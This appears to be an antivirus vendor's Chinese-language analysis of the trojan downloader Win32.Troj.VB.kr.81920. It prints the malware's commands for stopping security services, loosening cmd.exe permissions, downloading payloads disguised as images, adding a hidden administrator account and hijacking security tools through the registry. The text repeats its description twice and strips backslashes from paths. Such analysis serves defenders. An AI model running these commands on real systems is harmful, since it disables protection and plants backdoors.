金山毒霸2009
金山清理专家
专杀工具
在线杀毒
密保
网盾
系统急救箱
ARP防火墙
病毒名:Win32.Troj.VB.kr.81920
本病毒所有命名:
影响系统:
Win9x,WinMe,Linux
简介:
1. 运行后首先Sleep(),挂起10分钟。然后下载病毒列表。 2. cacls.exe C:Windowssystem32cmd.exe /e /t /g everyone:F 更改cmd权限为所有用户可以执行
行为分析:
这是个木马下载器。它会将自己设为管理员权限,映像劫持大量的杀毒软件。然后从指定网址下载大量其它木马程序。
:
影响系统:
Win9x,WinMe,Linux
简介:
1. 运行后首先Sleep(),挂起10分钟。然后下载病毒列表。 2. cacls.exe C:Windowssystem32cmd.exe /e /t /g everyone:F 更改cmd权限为所有用户可以执行
行为分析:
这是个木马下载器。它会将自己设为管理员权限,映像劫持大量的杀毒软件。然后从指定网址下载大量其它木马程序。
描述:
1. 运行后首先Sleep(),挂起10分钟。然后下载病毒列表。
2. cacls.exe C:Windowssystem32cmd.exe /e /t /g everyone:F
更改cmd权限为所有用户可以执行
执行 cmd.exe /c net stop wscsvc&
net stop sharedaccess&
sc config sharedaccess start=disabled&
sc config wscsvc start= disabled&
net stop KPfwSvc&
net stop KWatchsvc&
net stop McShield&
net stop "Norton AntiVirus Server
终止或禁用一些服务
3.查找并终止以下进程shstat.exe, runiep.exe, ras.exe, MPG4C32.exe,
imsins.exe, Iparmor.exe, 360safe.exe, 360tray.exe, kmailmon.exe,
kavstart.exe, cacls.exe, cmd.exe。
4.查找杀软ccenter.exe,如果找到下载
http://ps.go****o.com/rc/1500/rav.jpg
保存到C:windowssystem32
av.exe执行。
rav.exe会生成C:windowssystem32
essdt.exe
注册ressdt.sys驱动,恢复ssdt,然后del ressdt.exe
5.读取http://ps.go****o.com/rc/1500/gx.txt
下载的病毒列表,并执行,实际读出的是0。下载http://ps.go****o.com/rc/1500/gx.jpg
到本地C:windowssystem32vbb.exe并执行,这个vbb.exe会下载一些其他的病毒。
6.写入注册表自启动
HKEY_LOCAL_MACHINESOFTWAREMicrosoft
WindowsCurrentVersionRunSoundMan
删除一下注册表项
HKEY_LOCAL_MACHINESOFTWAREMicrosoft
WindowsCurrentVersionRun
360Safetray
KavPFW
vptray
runeip
RavTask
RfwMain
kav
7.添加一个用户new1密码12369到管理员组
cmd.exe /c net user new1 12369 /add&
net user new1 12369&
net user new1 /active:yes&
net localgroup administrators new1 /add
8.通过写入一个1.inf的文件并执行,注册为服务启动,替换原系统服务键值
HKEY_LOCAL_MACHINESYSTEMControlSet001Servicehelpsvc
原键值%SystemRoot%System32svchost.exe -k netsvcs
为%SystemRoot%System32interne.exe
其执行的语句如下:
cmd /c echo [Version]>%windir%1.inf&
echo Signature="$WINDOWS NT$">>%windir%1.inf&
echo [DefaultInstall.Services]>>%windir%1.inf&
...
(略去数行)
9.新建键值
HKLMSOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList
ew1=0
10.映像劫持,导致一些安全工具打不开。
把HKLMSoftWareMicrosoftWindows NTCurrentVersionImage File Execution Options
cftmon.exedebugger=soundman.exe
360tray.exe=svchost.exe
360safe.exe=svchost.exe
360Loader.exe=svchost.exe
kmailmon=svchost.exe
IceSword=svchost.exe
runiep=svchost.exe
ras=svchost.exe
Iparamor.exe=svchost.exe
taskmgr.exe=svchost.exe
11. 屏蔽隐藏文件的选项
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHiddenSHOWALLCheckedValue
1. 运行后首先Sleep(),挂起10分钟。然后下载病毒列表。
2. cacls.exe C:Windowssystem32cmd.exe /e /t /g everyone:F
更改cmd权限为所有用户可以执行
执行 cmd.exe /c net stop wscsvc&
net stop sharedaccess&
sc config sharedaccess start=disabled&
sc config wscsvc start= disabled&
net stop KPfwSvc&
net stop KWatchsvc&
net stop McShield&
net stop "Norton AntiVirus Server
终止或禁用一些服务
3.查找并终止以下进程shstat.exe, runiep.exe, ras.exe, MPG4C32.exe,
imsins.exe, Iparmor.exe, 360safe.exe, 360tray.exe, kmailmon.exe,
kavstart.exe, cacls.exe, cmd.exe。
4.查找杀软ccenter.exe,如果找到下载
http://ps.go****o.com/rc/1500/rav.jpg
保存到C:windowssystem32
av.exe执行。
rav.exe会生成C:windowssystem32
essdt.exe
注册ressdt.sys驱动,恢复ssdt,然后del ressdt.exe
5.读取http://ps.go****o.com/rc/1500/gx.txt
下载的病毒列表,并执行,实际读出的是0。下载http://ps.go****o.com/rc/1500/gx.jpg
到本地C:windowssystem32vbb.exe并执行,这个vbb.exe会下载一些其他的病毒。
6.写入注册表自启动
HKEY_LOCAL_MACHINESOFTWAREMicrosoft
WindowsCurrentVersionRunSoundMan
删除一下注册表项
HKEY_LOCAL_MACHINESOFTWAREMicrosoft
WindowsCurrentVersionRun
360Safetray
KavPFW
vptray
runeip
RavTask
RfwMain
kav
7.添加一个用户new1密码12369到管理员组
cmd.exe /c net user new1 12369 /add&
net user new1 12369&
net user new1 /active:yes&
net localgroup administrators new1 /add
8.通过写入一个1.inf的文件并执行,注册为服务启动,替换原系统服务键值
HKEY_LOCAL_MACHINESYSTEMControlSet001Servicehelpsvc
原键值%SystemRoot%System32svchost.exe -k netsvcs
为%SystemRoot%System32interne.exe
其执行的语句如下:
cmd /c echo [Version]>%windir%1.inf&
echo Signature="$WINDOWS NT$">>%windir%1.inf&
echo [DefaultInstall.Services]>>%windir%1.inf&
...
(略去数行)
9.新建键值
HKLMSOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList
ew1=0
10.映像劫持,导致一些安全工具打不开。
把HKLMSoftWareMicrosoftWindows NTCurrentVersionImage File Execution Options
cftmon.exedebugger=soundman.exe
360tray.exe=svchost.exe
360safe.exe=svchost.exe
360Loader.exe=svchost.exe
kmailmon=svchost.exe
IceSword=svchost.exe
runiep=svchost.exe
ras=svchost.exe
Iparamor.exe=svchost.exe
taskmgr.exe=svchost.exe
11. 屏蔽隐藏文件的选项
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHiddenSHOWALLCheckedValue
回复
评论病毒
